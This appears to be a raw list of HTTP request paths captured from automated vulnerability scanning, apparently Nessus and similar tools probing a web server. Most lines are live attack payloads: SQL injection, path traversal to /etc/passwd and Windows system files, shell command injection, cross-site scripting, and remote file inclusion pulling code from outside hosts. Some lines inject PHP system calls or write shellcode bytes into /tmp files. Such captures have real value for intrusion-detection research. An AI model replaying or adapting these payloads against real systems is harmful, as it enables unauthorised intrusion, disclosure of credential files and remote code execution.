/nmw0do67.cfc? /scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1702272795,0,0,0,0,0-- /manager/core/api.php?t_path_core=/etc/passwd\x00 /pxagj7n7.dll? /main.php?stuff="del\xa0q89318346&rem\xa0 /examples/jsp/num/notify?from=nessus"|id" /javascript/document.ep /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 / /sysuser/docmgr/iecreate.stm?template=../ /um7xpn15.x? /scripts/yfmo7jpwvpv1.asp /include/default_header.php?script_path=http://cirt.net/rfiinc.txt? /cgis/fileseek.cgi?foot=&head=;cat /etc/passwd| /main.php?logout="\x0drm q11745557 # /examples/jsp/colors/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00 /ttxssh2_213/ /9o6g5vkn.x? /examples/jsp/checkbox/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /cgi-bin/cvsblame.cgi?file= /top.php?stuff="&ping\x09-w\x0910000\x09-n\x091\x094.3.2.1&rem\x09 /cgi-914/fileseek.cgi?foot=&head=;cat /etc/passwd| /it's a wonderful life - alchemy_rg/ /cgi-bin/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd /examples/jsp/sessions/faxsurvey?cat /etc/passwd /scripts/news.scr.php?globals[pth][classes]=http://192.168.202.118:8080/zz5thkvtmlgl?? /video_subscription/ /post.asp?method=topic&forum_id=1&cat_id=1&type=wvs-xss-magic-string-410016083323 /o6ebbirj.idc? /help.php?q="&ver,>q17457396&rem, /examples/jsp/error/supporter/tupdate.php?groupid=change&sg=' /p043snfr.asp? /t3af3tdz.jspa? /l752x1ry.exe? /scriptpath/index.php?page=http://192.168.202.96:8080/whmch8ftkt7kv? /subscriptiontab/ /serversidescripting/ /t3af3tdz.dll? /hipkz026.jspa? /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../vtigerservice.php\x00 /n9xlumt5.cfc? /examples/servlets/servlet/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00 /n1afe1y6.asp? /search.php?do_search=search&searchword="/><"1&catid_search=0 /forum1.asp?n=1753&nn=/etc/passwd /m4kkjf8l.dll? /help.php?q="|ping\xa0-w\xa010000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /examples/jsp/num/base_local_rules.php?dir= /script_path/config.inc.php?_path=@rfiurl?_path=@rfiurl? /chat_script/ /opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\x00 /fcgi-bin/windmail.exe /3m5knyc4.asp? /order/login.php?svr_rootscript=http://192.168.202.118:8080/ghl9il? /verify.asp?username=' /en-us/i686v90l.fts? /d44uk9h2.htm? /javascript/subscribe.exe /webdav/phprun.php?cmd=c:\wce.exe -l //..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd /'.$_server['php_self'].'?act=img&img=delete /yver8r9o.nsf? /gy23xnjq.aspx? /scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919001 /cgi-bin/scripts/*\x0a.pl /javascript/monthly.exe /cacti/shared/help.php?page=../../../../../../../../../../etc/passwd\x00 /javascript/check.exe /169okeyj.nsf? /opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/txenjrxf3?\x00 /scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/iroy1gvqrrqu? /scripting-r0/ /examples/jsp/checkbox/snpfiltered.pl?t=c&u= /webcgi/fileseek.cgi?foot=;cat /etc/passwd&head= /.dll /lmw4r201.asp? /examples/jsp/error/forum_2.php?msg=10&return= /examples/jsp/sessions/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html / /jnv890lt.nsf? /index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331909407','5'-- /examples/servlets/servlet/edit.jsp?page=user&editor=../../../install /eei78ore.do? /javascript/compressed.exe /main.php?stuff="uname >q49686563 # /top.php?stuff=ver\x0b>q36516596&rem\x0b /top.php?stuff=\x0auname\x09>q15522652\x09# /cacti/index.php?album=../../../../../../../../../../etc/passwd\x00 /zul'gurub/ /examples/jsp/error/port.php?proto=tcp' /recordings/port.php?proto=tcp' /examples/jsp/num/simple/view_page?mv_arg=|cat /etc/passwd| /scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1331904471.php. /recordings/directory.php?dir=;cat /etc/passwd /examples/jsp/sessions/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini /examples/jsp/cal/user.cgi?url=">&from=add /weq93ppb.pl? /pxtoolbar.exe/ /examples/servlets/servlet/shopaddtocart.asp?productid='42 /jnv890lt.asp? /examples/jsp/num/edit.jsp?page=user&editor=../../../install /d5a5renl.x? /examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61586800228~ /ddoworrl.idc? /en-us/fo564rei.htm? /webmaster-scripts/ /.svn/text-base/.htpasswd.svn-base /main.php?stuff="ver\x0b>q36113668&rem\x0b /downloads/pafiledb.php?action=rate&id=4?\"<script>alert('vulnerable')</script>\" /examples/jsp/cal/cal2.jsp?time=8am style=xss:e/**/xpression(try{a=firsttime}catch(e){firsttime=1;alert('tomcat_sample_cal2_xss2.nasl')}); /cacti/search.php?searchstring= /iajtej82.pl? /examples/jsp/error/showproduct.php?product=1' /esmozg5d.htm? /en-us/hipkz026.dll? /scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1247962577,2,176146104,4,5,6,7,8,9,0,1,2,3 -- /help.php?q="\x0drm\x09q93881688\x09# /javascript/cookie.exe /edzaia0i.jspa? /script/menu/menuprincipal.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz? /main.php?logout='&sleep\x0910\x09# /scripts/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini /script/ident/loginliste.php?path_inc=http://192.168.202.118:8080/ghl9il? /index.php?id='union/**/select/**/0,0,1888865436,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /scripts/ /d5a5renl.pl? /i7prbs22.fts? /javascript/controller.exe /0u75ldxq.jspa? /x2gyorli.kspx? /magazine_subscriptions/ /help.php?q='&del\x09q11888742\x09# /scriptpath/index.php?page=http://192.168.202.118:8080/zz5thkvtmlgl? /help.php?q="\x0arm\x09q76195479\x09# /scripts/event_view.php?eid=34 union select 125016811 /scripts/9pen4xzgztjn.inc /aj3pf49c.exe? /phpmyadmin/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini /cgi-bin/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl /scripts/calendar_admin.pl?config=|cat /etc/passwd| /cgi-sys/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /ywaxntrx.do? /7uz3ok60.cfc? /zroo33l4.nsf? /interface/login/login_frame.php?site=;waitfor delay '0:0:15';-- /examples/jsp/colors/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00 /help.php?q=";sleep 9 # /phpmyadmin/search.jsp?q=%" /examples/jsp/checkbox/item.fts?href=">; /examples/servlets/servlet/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\x00 /scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332008335,1,1403210863-- /scripts/msg.txt /scripts/x_news.php /opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00 /main.php?stuff="|ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/liiwypqnoh.sh'); function v /ovcgi/getnnmdata.exe /scripts/1331919077-ror_session_fixation.nasl /examples/jsp/colors/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /top.php?stuff="\x0arm q56276124 # /6dlc2zm9.nsf? /examples/servlets/servlet/mlog.html?screen=/etc/passwd /top.php?stuff='sleep 11 # /en-us/account/index.php?id=mumrj3sj0o' /zv8tv7h8.htm? /scripts/6gl21a1hiz3s.cfm /b4vng02k.aspx? /dda2qr7j.php3? /help.php?q="ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /examples/servlets/servlet/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd /odzk29aa.htm? /main.php?stuff=&ver\x09>q82426871&rem\x09 /robocop director's cut/ /ows-bin/c32web.exe/changeadminpassword /vac1l5vm.html? /cgi-perl/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /en-us/scripts /examples/jsp/sessions/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl /hipkz026.do? /examples/jsp/error/nessus"> /scripts/c0kha6w3apd3.inc /help.php?q=';del\x09q69988199\x09# /main.php?logout="|ping\xa0-w\xa07000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /lsoix5h3.cgi? /script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.96:8080/4dckqcc0acprbz?? /h5i6crm3.kspx? /help.php?q="\x0duname >q66781813 # /iktok2bw.nsf? /en-us/account/javascript.php?abs_path=/etc/passwd\x00 /mpcgi/pfdispaly.cgi?../../../../../../../../../../etc/passwd /help.php?q='\x0duname\x09>q24981853\x09# /cgi-scripts/ /82q7ywa8.mscgi? /en-us/account/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- /6qbynt4f.cfm? /3j8echh0.dll? /javascript/util.exe /mpcgi/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|' /33y9gcqq.html? /w4996nr0.jspa? /javascript/scheduling.exe /help.php?q="ping -w 11000 -n 1 4.3.2.1&rem /main.php?stuff="|ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /examples/jsp/num/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl /help.php?q="del\x09q91583756&rem\x09 /scripts/gallery.scr.php?globals[pth][func]=http://192.168.202.118:8080/zz5thkvtmlgl?? /169okeyj.do? /i686v90l.php? /examples/jsp/colors/admin/top.php?admindir=/etc/passwd\x00 /fcgi-bin/gw5/gwweb.exe?help=bad-request /fc9t54l7.asp? /ttxssh2_211/ /examples/jsp/colors/search.jsp?q=%" /scripts/admin/admin.cgi /index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332009307','5'-- /help.php?q=;uname >q94314237 # /examples/jsp/error/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`; /mpcgi/gw5/gwweb.exe?htmlver=aaa&get-context /starnet/addons/slideshow_full.php?album_name='1055703356 /phpmyadmin/cart32.exe /order/login.php?svr_rootscript=http://cirt.net/rfiinc.txt? /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../vtigerservice.php\x00 /edv3mapy.asp? /en-us/account/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00 /awstats/awstats.pl?migrate=|echo;/./tmp/cbpxmnuvtn.sh;echo|awstats973506.txt /login.php?ref='> /examples/jsp/jsp2/el/core/api.php?t_path_core=/etc/passwd\x00 /examples/jsp/checkbox/man-cgi?section=0&topic=ls;id /phpmyadmin/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00 /cgi-home/view_item?html_file=../../../../../../../../../../etc/passwd\x00 /scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904228 /revdescription/ /phpmyadmin/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00 /qb2xy9aw.php? /main.php?frm_daynight=day&frm_passwd=q55541722&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width= /pxagj7n7.php? /ddoworrl.html? /en-us/jnv890lt.dll? /qczkquis.jspa? /cgi-bin/listrec.pl?app=qmh-news&template=;ls /etc| /scripts/base_main.php /resetpw.php?email=../../../../../../../../../../../../etc/passwd /examples/jsp/jsp2/el/a1disp3.cgi?/../../../../../../etc/passwd /javascript/.htpasswd.sfish/-->">'>'" /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908854,0x3a,1781864537),3,4,5,6,7,8,9,10,11,12,13,14,15,16 /top.php?stuff="|ping\x0c-w\x0c9000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c /x'squeezeme!_v3/ /top.php?stuff="rm\x0bq24192811&rem\x0b /phpmyadmin/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd /manager/a1disp3.cgi?/../../../../../../etc/passwd /examples/servlets/servlet/hw3.cgi?daysonly=0).system('id').( /javascript/sell.exe /yver8r9o.kspx? /help.php?q="ver\x0b>q54818771&rem\x0b /top.php?stuff=ver\x0b>q41385468&rem\x0b /main.php?stuff='\x0arm\x09q88589696\x09# /cacti/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00 /examples/jsp/sessions/htmlscript?../../../../../../../../../etc/passwd /javascript/.passwd.gz /phpmyadmin/documentation.html?phpmyadmin=..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+555+/tmp/ftxarcvjda0;')."]=1 /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://192.168.202.118:8080/moclyxlwqyfjnp? /sdk/../../../../../..//etc/vmware/hostd/vminventory.xml /subscriptions.tpl /en-us/ddoworrl.cfc? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/sdlffngmto0;'); function v /top.php?stuff=ping;-w;7000;-n;1;4.3.2.1|rem; /en-us/s7qus4g3.x? /main.php?stuff='&uname\x09>q47285252\x09# /nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=go&linecnt=500&refresh=0 /examples/jsp/sessions/shoutbox.php?conf=../ /examples/jsp/colors/simple/view_page?mv_arg=|cat /etc/passwd| /scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir /main.php?stuff="ping,-w,11000,-n,1,4.3.2.1|rem, /scripts/wsasp.dll/wservice=wsbroker1/webtools/oscommand.w /javascript/keep.exe /detail.php?id=-1' /console/faces/com_sun_web_ui/help/masthead.jsp?windowtitle= /.aspx /top.php?stuff="rm q85581856&rem /d7ktpmcq.do? /top.php?stuff="&rm q91375949&rem /newssubscriptions/ /t7tm4m0b.php? /yver8r9o.idc? /jsorijscript/ /examples/jsp/jsp2/jspx/wiki.php/ /cgi-bin/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00 /cgi-bin/base_local_rules.php?dir= /0qhcnefz.cgi? /bxnyrhmh.idc? /en-us/dda2qr7j.nsf? /nyjgaorz.cgi? /main.php?stuff=&ping;-w;7000;-n;1;4.3.2.1&rem; /cacti/config.php?returnpath=/etc/passwd\x00 /examples/jsp/jsp2/el/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl /scripts/utilities/login.asp /en-us/w4996nr0.exe? /private's most beautiful breasts - silvia saint/ /ao22ww7y.dll? /help.php?q='\x0drm q17837735 # /rubrique.asp?no=/....../boot.ini|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'. /help.php?q="&uname\x09>q99796972\x09# /help.php?q="&del q26584324&rem /qb2xy9aw.asp? /f-script/ /help.php?q="|ping\x09-w\x0910000\x09-n\x091\x094.3.2.1|rem\x09 /scripts/login.asp /javascript/imagefolio.exe /cgi-perl/.passwd /mv8wxfy9.pl? /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /examples/jsp/sessions/phf?qalias=x\x0a/bin/cat /etc/passwd /scripts/lrn28issfuqi.php /javascript/~test.exe /9kr0ih0v.pl? /main.php?stuff="ping;-w;11000;-n;1;4.3.2.1&rem; /examples/servlets/servlet/simple/view_page?mv_arg=|cat /etc/passwd| /recordings/js/scripts.php?load=/etc/passwd\x00 /main.php?stuff="&ver&rem; /edv3mapy.htm? /wheelman's - bushpig/ /lsoix5h3.php? /6wb70v0b.php3? /examples/jsp/colors/bandwidth/index.cgi?action=showmonth&year=&month= /b4vng02k.php3? /jnv890lt.php? /cacti/sgdynamo.exe?htname= /javascript/jpg.exe /copatranscript_20061107/ /1qwv2p5p.kspx? /en-us/account/include/error/autherror.cfm?errorcode=1&ftvar_linkp=">cross_site_scripting.nasl /ttxssh2_101/ /help.php?q="&ver >q92537281&rem /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir+c:\" /manager/jgs_portal_statistik.php?meinaction=themen&month=1&year=1' /jnv890lt.dll? /? /scripts/ui/login?user=nessus-1331919064 /examples/servlets/servlet/starnet/addons/slideshow_full.php?album_name='868160889 /main.php?stuff='uname\x09# /examples/jsp/cal/minis.php?month=../../../../../../etc/passwd /hrttz9fj.jsp? /aj3pf49c.mscgi? /cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010414,1557267964 -- /ghswfouu.html? /fa8p8lr8.htm? /j2kdmfw4.php3? /index.php?c=access&a=login&ref_c=nessus">&ref_a=projectpier_login_page_xss.nasl"> /mysubscriptions/ /g3w7y7u5.php? /0qhcnefz.nsf? /pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://cirt.net/rfiinc.txt? /examples/jsp/colors/embed/day.php?path=/etc/passwd\x00 /examples/jsp/num/item.fts?href=">; /bn857frh.exe? /scripts/qg9h0c0svvat.php /main.php?stuff='sleep 9 # / /scripts/1hactwocbsuo.php3 /scripts/contents.htm /top.php?stuff=&ver >q39715573&rem /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/vir0v3xfc?? /jdx255ea.do? /templates/prescription/?d=a //q47719336&q1431"q1431<q1431>q47719336 /apavxugx.jspa? /main.php?logout="&ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /scripts/bizmail.cgi /examples/jsp/checkbox/index.php?id=' /weq93ppb.dll? /help.php?q='&uname\x09>q42899831\x09# /top.php?stuff="&del,q38169729&rem, /comments/browse.php?fid=2&tid=4&go=<script>alert('vulnerable')</script> /6n7aacgg.x? /ywaxntrx.exe? /main.php?logout='sleep 9 # /scripts/adodb/server.php?sql='adodb_sql_sql_injection.nasl /main.php?logout="ver&rem /en-us/esmozg5d.cfm? /7uz3ok60.mscgi? /cgi-home/sensepost.exe?/c+dir /index.php?op=default&date=200607' union select 1,1310726682,1,1,1,1,1,1,1,1--&blogid=1 /scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 760871658,2,576927904,4,5,6,7,8,9,0,1,2,3 -- /en-us/account/index.php?mod_id=2&kb_ask= /yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.118:8080/zz5thkvtmlgl?? /top.php?stuff=\x0duname >q31716147 # /examples/jsp/num/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html /examples/jsp/colors/supporter/tupdate.php?groupid=change&sg=' /cgi-bin/index.php?sensor_program= /e9rx3ya4.jsp? /recordingssearch_results.dot?search_query=nessus">/ /bl8sefdm.php? /fmnveedu.do? /admin/script.php /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/mpnqzgnare0;'); function v /uc3w3bdi.jspa? /m5103snj.cfm? /vhzmaia2.aspx? /javascript/porn.exe /j4drbkil.php? /main.php?stuff='\x0ddel\x09q61875212\x09# /en-us/h5sc3gxy.jsp? /3m5knyc4.cfc? /ap58k3ci.php? /vubbxss/ /cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null -- /javascript/document.stackdump /scripts/admin/addentry.php?phpbb_root_path=/etc/passwd\x00 /cgi-bin/phptonuke.php?filnavn=/etc/passwd /nsn/..\util/type.bas /scripts/nryr3lvrjnwx.cgi /examples/jsp/error/js/scripts.php?load=/etc/passwd\x00 /cgi-bin/search.php?searchstring= /recordings/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini /bxnyrhmh.x? /zmvq66jy.dll? /main.php?stuff=ver,>q34852419&rem, /scripts/help.php?section='qualiteam_xcart_sql_xss.nasl /cgi.cgi/windmail.exe /examples/jsp/checkbox/sawmill6cl.exe?ho+{complete_version} /cactisearch-results.dot?search_query=nessus">/ /en-us/account/starnet/addons/slideshow_full.php?album_name='1580973315 /scripts/base_local_rules.php?dir= /en-us/ddoworrl.jspa? /don't fuck this up/ /examples/jsp/num/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /h5i6crm3.exe? /5o9zq43e.fts? /1r8cfrlf.php? /opensiteadmin/scripts/classes/fieldmanager.php?path=@rfiurl\x00 /scripts/cevvxrxqxc_b.inc /main.php?stuff='\x0asleep 11 # /help.php?q="rm;q77231587&rem; /manager/include/sql.php?include_path=/etc/passwd\x00 /recordings/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog /press-conference_transcript/ /en-us/account/error.php?selected_theme= /examples/jsp/num/search.cgi?..\..\..\..\..\..\winnt\win.ini /main.php?logout='\x0duname >q95689814 # /main.php?logout="del\x09q46762746\x09# /weq93ppb.cgi? /recordings/help/index.php?help_file=../../../../../../../../../../../etc/passwd /scripts/tomcat_proxy_directory_traversal.nasl1331909178 /scripts/tools/newdsn.exe /ccert's practice in anti-spam/ /a0imiuf1.pl? /footer.inc.php?la_pow_by= /aj3pf49c.nsf? /vhzmaia2.do? /fnwhrxyd.html? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+5b+0c+83+c3+0c+89+da+8b+5b+04+39+d3+75+01+cc+8b+73+30+89+ef+6a+0d+59+66+ad++>>ctdn /q703m78q.idc? /examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.bak /t7tm4m0b.aspx? /ydexw8by.jspa? /help.php?q="\x0ddel\x09q41994252\x09# /cgi-bin/store.cgi?startid=../../../../../../../../../../etc/passwd\x00.html /forum/index.php?method=<script>alert('vulnerable')</script> /fpnpp5zg.idc? /examples/jsp/colors/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /main.php?stuff="|ping\x0b-w\x0b7000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /cacti/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini /examples/jsp/checkbox/base_qry_common.php?base_path=/etc/passwd\x00 /phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /scripts/cdjnwtwnqga1.php3 /scripts/qbch5ojumj32.asp /description-viagra/ /ygkjkngd.aspx? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/pzeceeynoq0;'); function v /help.php?q=;rm\x09q84834127\x09# /examples/jsp/cal/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /maxd641.exe/ /scripts/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /examples/jsp/num/al_initialize.php?alpath=/etc/passwd\x00 /examples/jsp/jsp2/jspx/shoutbox.php?conf=../ /scripts/customer.pl /edv3mapy.kspx? /phpmyadmin/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /scripts/webplus?about /webcgi/htimage.exe/path/filename?2,2 /main.php?stuff="&del\x0bq52976574&rem\x0b /opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\x00 /nopasswd/ /0u75ldxq.php? /themes/default/index.php?theme[options]=1&settings[skin]=../../default/images/top.gif\x00 /en-us/odzk29aa.nsf? /m4kkjf8l.mscgi? /scripts/environ.pl /scripts/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`; /base_qry_common.php?base_path=/etc/passwd\x00 /fa8p8lr8.jspa? /b1q8bywu.fts? /examples/servlets/servlet/js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js /index.php?id='union/**/select/**/0,0,1424469027,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /raanw4ia.aspx? /examples/jsp/checkbox/viewpage.php?file=/etc/passwd /examples/servlets/servlet/index.php?sensor_program= /zv8tv7h8.mscgi? /rv98iwjp.cfm? /examples/jsp/error/index.cfm?fuseaction=category.display&category_id=' /5o9zq43e.php? /main.php?stuff="&ver\x09>q89486418&rem\x09 /examples/jsp/jsp2/jspx/source?v=../../../../../../../../../../etc/passwd\x00 /fa8p8lr8.php3? /awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/qcywjpzuja0;echo|awstats232216.txt /webcgi/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /javascript/don.exe /0qhcnefz.cgi? /examples/servlets/servlet/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x /script/gestion/index.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8? /test.php?evalme=eval($_server[http_x_axkqdcilykzzimkvzxg]); /top.php?stuff='|sleep\x0910\x09# /nispasswd/ /cgi-bin/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /ace-auto's/ /examples/jsp/sessions/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt /examples/jsp/colors/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00 /jules verne, the world's greatest prophet science and invention, vol/ /7o5qp766.php? /zv8tv7h8.cgi? /top.php?stuff="del,q55729425&rem, /5qnlm5z2.jsp? /awstats/awstats.pl?migrate=|echo;/bin/echo -en "zj\0003x\0315\0200xp1\0322\0262\0377\0266\0377\0001\0320" >> /tmp/ysooqnjtxq0;echo|awstats824539.txt /help.php?q=&ver >q32627628&rem /news.php?scriptpath=http://192.168.202.118:8080/moclyxlwqyfjnp?? /zroo33l4.exe? /examples/jsp/num/search.php?searchstring= /manager/server.pt?open=space&name=";} /cgi-bin/check_user_id.php?user_id= /raanw4ia.kspx? /javascript/past.exe /main.php?logout="|ping,-w,9000,-n,1,4.3.2.1|rem, /scripts/shopper.cgi?newpage=../../../../../../etc/passwd /ybz5rz7a.pl? /byrg33fw.exe? /examples/jsp/security/protected/.j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.swp /examples/jsp/colors/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd /zorum/index.php?method=<script>alert('vulnerable')</script> /scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il? /o1zj4u9v.exe? /scripts/udblphlq4nln.php /scriptcontent/ /azcrfs8d.do? /vb-script/ /vwmg565s.jsp? /scripts/sitemap.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt?? /en-us/s7qus4g3.cfm? /main.php?stuff=";sleep 8 # /top.php?stuff='\x0auname\x09>q46955555\x09# /help.php?q="del q41912626&rem /examples/jsp/colors/index.php?gadget=glossary&action=view&term= /esmozg5d.idc? /main.php?frm_daynight=day&frm_passwd=&frm_referer=q49168279&frm_user=&scr_height=&scr_width= /php/php.exe?c:\winnt\boot.ini /scripts/desktopmodules/bdpdt/uploadfilepopup.aspx /examples/jsp/checkbox/fxm.exe /top.php?stuff="ping\x09-w\x0910000\x09-n\x091\x094.3.2.1&rem\x09 /scripts/admin/objects.inc.php4?server[path]=http://xxxxxx&server[language_file]=nessus.php /manager/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; /suse linux pwdutils 'chfn' utility local privilege escalation exploit/ /q703m78q.aspx? /j734qobz.php? /7u1pb2xi.kspx? /recordings/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd /ghswfouu.cgi? /en-us/account/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349 /main.php?stuff="&ping\x0c-w\x0c7000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /scripts/rihzp7swr3p6.cgi /edv3mapy.aspx? /examples/jsp/jsp2/jspx/texis.exe/nessus /cgi/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /examples/jsp/error/index.php?id=' /cgi-win/fileseek.cgi?foot=;cat /etc/passwd&head= / /main.php?logout="ping;-w;11000;-n;1;1.2.3.4&rem; /x2gyorli.kspx? /subscriptions.lib /weq93ppb.cgi? /query.idq?citemplate=../../../../../../../../../../winnt/win.ini /examples/jsp/jsp2/el/rot13sj.cgi?/etc/passwd /l4fz1dqw.html? /cacti/core/api.php?t_path_core=/etc/passwd\x00 /top.php?stuff='\x0ddel q76686472 # /9ko6m4c8.dll? /bl8sefdm.fts? /t578vqea.kspx? /examples/jsp/checkbox/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /main.php?stuff="ver >q63222197&rem /eei78ore.exe? /cgi-bin/nul/../../../../../../../../../winnt/system32/ipconfig.exe /examples/jsp/jsp2/jspx/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00 /d5a5renl.jspa? /scripts/zq9frlz6fcfp.sh /main.php?stuff='\x0asleep 8 # /cgi-bin/default.asp?istate=duclassmate_sql_injections.nasl'&nstate=utah /"britney spears"/ /phpmyadmin/pfdispaly?../../../../../../etc/passwd /if69ddo1.cfc? /zqqemp6j.exe? /javascript/postpaid.exe /en-us/esmozg5d.php3? /subscriptions.lst /en-us/account/search.jsp?q=%" 